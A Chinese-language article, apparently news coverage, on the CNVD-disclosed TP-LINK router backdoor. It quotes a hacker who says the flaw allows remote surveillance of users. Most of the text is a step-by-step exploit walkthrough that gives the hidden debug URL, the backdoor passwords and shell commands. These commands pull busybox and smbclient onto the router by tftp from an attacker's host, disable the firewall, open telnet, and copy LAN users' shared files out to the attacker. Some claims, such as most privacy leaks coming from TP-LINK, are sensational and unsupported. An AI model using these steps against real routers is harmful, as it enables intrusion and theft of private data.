詳解TP-LINK路由器漏洞可遠程竊取隱私

　　近期，“TP-LINK漏洞門”事件被CNVD(國家信息安全漏洞共享平台)曝光後，在社會上引起了極大的關注。由於TP-LINK的市場占有率達到70%，很多網友擔心自己的信息是否被洩露。

　　據一位資深黑客介紹，TP-LINK路由器的後門漏洞危險程度遠遠大於目前披露的程度。他解釋，在攻擊漏洞的TP-LINK路由器時，並非一定要在本地連接路由器，而是可以通過遠程進入TP-LINK路由器，從而監控網友的所有上網行為，並且能夠竊取本地信息。也就是說，控制了用戶的TP-LINK路由器之後，也就可以監控用戶的上網行為，隨意從網友的電腦裡竊取一切信息，不管是隱私信息還是重要資料都可以信手拈來，而用戶根本不知道。

　　他做了一個演示，利用TP-LINK存在的後門漏洞，輕松的監控用戶的上網行為，用戶在QQ裡面聊了什麼，在淘寶上面買了什麼東西，他都能夠一目了然，在他的眼裡看來，用戶就是一個完全透明的人。而且，他還可以利用TP-LINK的漏洞進入用戶的電腦，不管用戶是在歐洲拍的婚紗照，還是在家裡和愛人拍的隱私照，只要他想盜取隨時都可以，完全沒有隱私可言。

　　他還介紹，TP-LINK的後門漏洞存在多年，一直都沒有被TP-LINK重視，而TP-LINK的市場占有率達到70%以上。所以，很多隱私洩露都與TP-LINK有關，不然黑客怎麼可能獲得用戶的隱私照片和銀行賬號，很多都是利用TP-LINK的漏洞完成的，只是用戶根本不知道而已。國內用水星和迅捷的用戶也難免厄運，因為水星和迅捷都是TP-LINK的馬甲，只要能夠找到TP-LINK路由器的漏洞，就能隨意進入水星和迅捷路由器用戶的電腦。就目前來說，TP-LINK的路由器大多存在問題，要想保證絕對安全幾乎不大可能。

　　以下是黑客利用TP-LINK路由器後門漏洞盜取用戶信息的演示：

　　一、環境拓撲圖

　　拓撲圖說明：

　　1、PC2使用公網IP，或者是連接公網的路由器下的DMZ設備;

　　2、TP-Link開啟遠程WEB訪問，示例中的8011為遠程WEB訪問端口;

　　3、PC2要開啟TFTP服務器;

　　4、TP-Link設備型號：TL-WR941N，實物圖請見附錄。

　　二、操作步驟

　　1、在TP-Link設備聯網情況下開啟遠程WEB訪問

　　2、PC2設備在聯網情況下，在地址欄輸入http://xxx.xxx.xxx.xxx：8011/userRpmNatDebugRpm26525557/start_art.html(xxx.xxx.xxx.xxx為TP-Link設備的WAN口IP，8011為遠程WEB訪問的端口號)，等待1分鐘左右出現如下頁面

　　3、PC2在地址欄輸入http://xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/linux_cmdline.html，出現TP-LINK設備的登錄頁面，輸入設備管理的用戶名和密碼(用戶名：admin，密碼：admin)，進入以下頁面(如圖5所示)，這個頁面需要的用戶名是：osteam，密碼是：5up。在這個頁面我們就可以大展拳腳了。接下來我們就利用漏洞來訪問TP-link局域網下的共享

　　4、PC2開啟tftp服務器，並在tftp服務器路徑下放置busybox/libbigballofmud.so/smbclient/smbtree文件(後面會將這幾個文件通過tftp導入到TP-Link設備的/tmp目錄下)。在設備頁面的指令欄輸入tftp -g -r busybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa為PC2的公網IP地址)。

　　5、導入完成後在指令欄輸入ls -l，發現目錄下有了busybox

　　6、在指令欄輸入chmod 777 busybox，然後輸入ls –l，發現busybox的權限改為777

　　7、在指令欄輸入iptables -P INPUT ACCEPT/iptables -P FORWARD ACCEPT/iptables –F。這幾條命令是改變防火牆的過濾規則，操作後，該設備的防火牆就形同虛設了。

　　8、在指令欄輸入./busybox telnetd，開啟遠程telnet，如圖10。接下來我們就可以telnet該設備而不再依賴頁面了。

　　9、telnet TP-Link設備，這裡的用戶名root，密碼5up。如圖11，我已成功telnet到TP-Link的後台了，現在我們已經成功了一半了。

　　10、在telnet窗口輸入cd /tmp，進入該目錄後先後輸入tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/tftp -g -r smbclient aaa.aaa.aaa.aaa/tftp -g -r smbtree aaa.aaa.aaa.aaa(這幾個命令是將libbigballofmud.so/smbtree/smbclient通過TFTP導入到TP-Link的/tmp目錄下，所以要確保PC2開啟TFTP服務器)。

　　11、在telnet界面輸入以下命令

　　mount tmpfs /usr -t tmpfs

　　/tmp/busybox mkdir -p /usr/lib

　　/tmp/busybox cp /tmp/*so* /usr/lib/ -fr

　　/tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0

　　chmod 777 smbtree

　　chmod 777 smbclient

　　12、在/tmp目錄下執行./smbtree命令，即可搜索到該局域網下的共享文件信息

　　13、執行./smbclient //bbbb/bbbbbb(//bbbb/bbbbbb為圖14搜索到的一個共享文件目錄)，密碼為空，進入文件夾後執行ls，顯示該文件夾下的文件類容。

　　14、通過索引目錄，可以查詢到每一個目錄下的文件信息，如/mnt/files/cherryblossoms1.jpg。接下來我們就看看cherryblossoms1.jpg是一個什麼圖片。

　　15、將共享文件拷貝到TP-Link設備上的/tmp目錄下，執行命令get ccc(ccc為要拷貝的共享文件。

　　16、將文件通過tftp拷貝到本地設備上，執行命令/tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa。

　　17、在本地設備的tftp所在目錄下打開拷貝的文件。

　　注意事項：

　　1、TP-Link設備需要開啟遠程WEB訪問，示例中的8011為遠程WEB訪問的端口

　　2、本地設備最好使用公網IP，或者是連接公網的路由器下的DMZ設備

　　3、本地設備要開啟TFTP服務器

　　4、busybox/libbigballofmud.so/smbclient/smbtree需要拷貝在TP-Link下的/tmp目錄下

　　5、示例中的xxx.xxx.xxx.xxx為TP-link設備WAN口IP，aaa.aaa.aaa.aaa為PC2的公網IP，//bbbb/bbbbbb為搜索到的一個共享目錄，ccc為共享目錄下的一個共享文件

　　6、需要用到的工具有：tftpd32.exe、busybox、libbigballofmud.so、smbclient、smbtree。